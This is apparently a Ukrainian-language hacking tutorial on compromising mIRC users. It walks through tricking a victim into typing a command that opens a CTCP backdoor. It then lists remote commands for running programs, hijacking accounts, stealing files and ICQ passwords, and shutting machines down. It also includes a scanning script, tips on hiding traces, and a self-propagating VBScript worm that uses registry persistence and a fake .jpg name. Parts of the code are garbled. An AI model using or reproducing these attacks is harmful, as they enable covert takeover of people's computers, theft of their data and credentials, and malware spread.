Такмс… Для початку треба розповісти про уразливості =))
Немає легких методів злому, але злом irc буде досить простий якщо вам вдасться виконати місію і змусити користувача набрати потрібну вам команду.
Команда: //write St1m.log ctcp 1:*:?:$1- | Load -rs St1m.log

Що робить ета проста команда?!
Все дуже легко =))
//write St1m.log ctcp 1:*:?:$1- = записує в корінь irc файл під назвою St1m.log в якому міститься ctcp 1:*:?:$1-
Власно рассомтрим ctcp 1:*:?:$1 – слово ctcp говорить про те що це маска на ctcp команди цифра 1 означає що користувач з рівнем 1 (тобто все =)) може посилати вам ctcp запити. Далі йдемо маска :*:?: яка дозволяє всі запити і в самому кінці ідентифікатор $1 – який повертає всі ващи команди.
Так що вам треба всеголишь змусити користувача ввести дану рядок у своєму маленькому світі після чого він створить для себе вразливість.
Ось деякі команди:
Зробити щоб юзер зайшов на канал: /ctcp NICK /j #CHANNEL
Юзер залишає канал: /ctcp NICK /part #CHANNEL
Надіслати повідомлення від імені жертви: /ctcp NICK /msg #CHANNEL OUR MESSAGE…
Надіслати приватне повідомлення від імені жертви: /ctcp NICK /msg NICK(anyone) OUR MESSAGE…
Закрити mirc жертви: /ctcp NICK /exit
Змінити жертві пароль: /ctcp NICK /msg nickserv set passwd NEW_PASS
Змінити жертві нік: /ctcp NICK /nick NeW_NicK
Якщо жертва є ввом то наступною командою ви змушуєте її дати вам опа на каналі: /ctcp NICK /mode #channel +o OUR_NICK
Виконати на комп’ютері жертви команду MS-DOS: /ctcp NICK /run command
Відкрити mirc на комп’ютері жертви: /ctcp NICK /run mirc
Запустити редактор реєстру на компі жертви: /ctcp NICK /run regedit
Флуд на компі жертви: /ctcp NICK /timer1 0 0 /ping $me
Вирубати вінду на компі жертви: /ctcp NICK /run exitwindows

такмс…
Вже нетерпіться спробувати це все на практиці, але какже подивитися на мирк сервері чи є вже люди які ввели цю сходинку???

Скрипт скана мирк серверів

#SCAN
alias mass {
set %i 1
var %massmsgmsg Yes
set %nickme $me
:next
set %nick $nick(#,%i)
if (%nick == $null) goto done
if (%nick != $me) { /ctcp %nick /msg %nickme %massmsgmsg }
inc %i
goto next
:done
}

Я думаю тут все зрозуміло і без обьяснений =))
Так… тепер ми можемо знайти користувача на каналі з вразливістю і зможемо пожартувати над ним, але як же бути з більш серйозними атаками
Мінус в тому що ці команди не обробляють ідентифікатори, але зачемже тоді команда /write =)))
так ось приклад атаки та збору інформації про комп’ютер жертви
___________________________________________________________________________
— > Дізнаюся, в якій директорії лежить Мирк .exe
[06:59:12] -> [[SF]Norfolk] /WRITE fool.txt /notice Кевин_Митник $mircdir
[06:59:56] -> [[SF]Norfolk] /PLAY -c #hack fool.txt
[06:59:58] -[SF]Norfolk – D: Мірка
— > Дізнаюся на якому диску знаходиться WINDOWS
[07:02:21] -> [[SF]Norfolk] /WRITE fool.vbs set FSO = createobject(«scripting.filesystemObject»)
[07:02:33] -> [[SF]Norfolk] /WRITE fool.vbs set dirwin = fso.getspecialfolder(0)
[07:02:46] -> [[SF]Norfolk] /WRITE fool.vbs set text = fso.createtextfile(«fool.txt»)
[07:02:59] -> [[SF]Norfolk] /WRITE fool.vbs text.writeline “/notice Кевин_Митник” & “” & dirwin
[07:03:09] -> [[SF]Norfolk] /WRITE fool.vbs text.close
[07:03:36] -> [[SF]Norfolk] /PLAY -c #hack fool.txt
[07:03:38] -[SF]Norfolk – C:WINDOWS
— > Очищаю документи
[07:05:36] -> [[SF]Norfolk] /WRITE -c fool.txt
[07:05:39] -> [[SF]Norfolk] /WRITE -c fool.vbs
____________________________________________________________________________

Як ви вже зрозуміли можна записувати файли на комп’ютер жертви і потім програвати їх для певного каналу.

УВАГА: Жертва бачить що відсилає вам нотисы, так що раджу використовувати ето коли мирк жертви згортається в трей або жертви немає комп’ютера. І не забувайте чистити файли а краще видаляти їх з комп’ютера жертви.
Краще вимикати комп’ютер жертви командою /ctcp NICK /RUN shutdown.exe -s -f -t 00

Ось деякі ідентифікатори які допоможуть тобі зібрати потрібну інформацію

OS — $os
Host — $host
email — $emailaddr
Назва лода який лежить в папці під номером 100 — $findfile($mircdirlogs,*.*,100)
$disk(C:) — C: якщо диск існує то вам веррнется $true
$disk(D:) — D:
$disk(E:) — E:
mirc folder — $mircdir

Наступний приклад неработает в деяких серверах irc

Ви повинні змусити жертву набрати наступне:
/fserve OUR_NICK 4 c:

Після цього диск C: комп’ютера жертви буде відкритий для вас. І ви зможете робити наступне:

Команди:

cd: З допомогою цієї команди ви можете перейти в будь-яку папку.
Наприклад: cd windows (потрапите в папку windows)

dir: Команда як у MS-DOS

get: Важлива команда! Ви можете отримати будь-які файли з комп’ютера жертви. Жертва бачить передачу файлів, але якщо отримувати маленькі за об’ємом файли, то передача буде дуже швидкою і жертва може просто не помітити цього.

read: Читання текстових файлів.

Ви можете отримати пароль від ICQ жертви. Використовуючи команду get отримуєте файл .dat і можете отримати пароль від ICQ.

Далі більше.
Спробуємо написати вірус який буде розсилати себе по світу і заражати їх траянчегом

set FSO = createobject(«scripting.filesystemObject»)
set scriptini = fso.CreateTextFile(«C:Program Filesscript.ini»)
set virus = FSO.getfile(wscript.scriptfullname)
Set S = CreateObject(«Wscript.Shell»)
mircfile = “”&«St1m.jpg .vbs»
virus.copy(dirsystem&mircfile)
mircoff = dirsystem&mircfile
S. regwrite «HKEY_LOCAL_MACHINESOFTWAREMicrosoftwindowscurrentversionrunserviceskernel32», mircoff
scriptini.WriteLine “[script]”
scriptini.WriteLine «n0= on 1:JOIN:#:{»
scriptini.WriteLine «n1= if ( $nick == $me ) { halt }»
scriptini.WriteLine «n2= /dcc send $nick» &” “&mircoff
scriptini.WriteLine «n3= on 1:JOIN:#:{ „
scriptini.WriteLine “n4 /write St1m.st ctcp 1:*:?:$1- | Load -rs St1m.st „
scriptini.WriteLine “n5 }»
set f = fso.GetFolder(«C:Program Files)
sf set = f.SubFolders
for each f1 in sf
set viruss = FSO.getfile(«C:Program Filesscript.ini»)
file1 =””&«script.ini»
viruss.copy(f1&file1)
next

Якщо мирк знаходиться або буде знаходитися в Program Files то цей скрипт його обов’язково заразить і почне сам себе розсилати всім хто приєднується до каналів на яких сидить жертва. Навіть якщо жертва видалить мирк і перевстановить її то після перезавантаження новий мирк знову заразиться.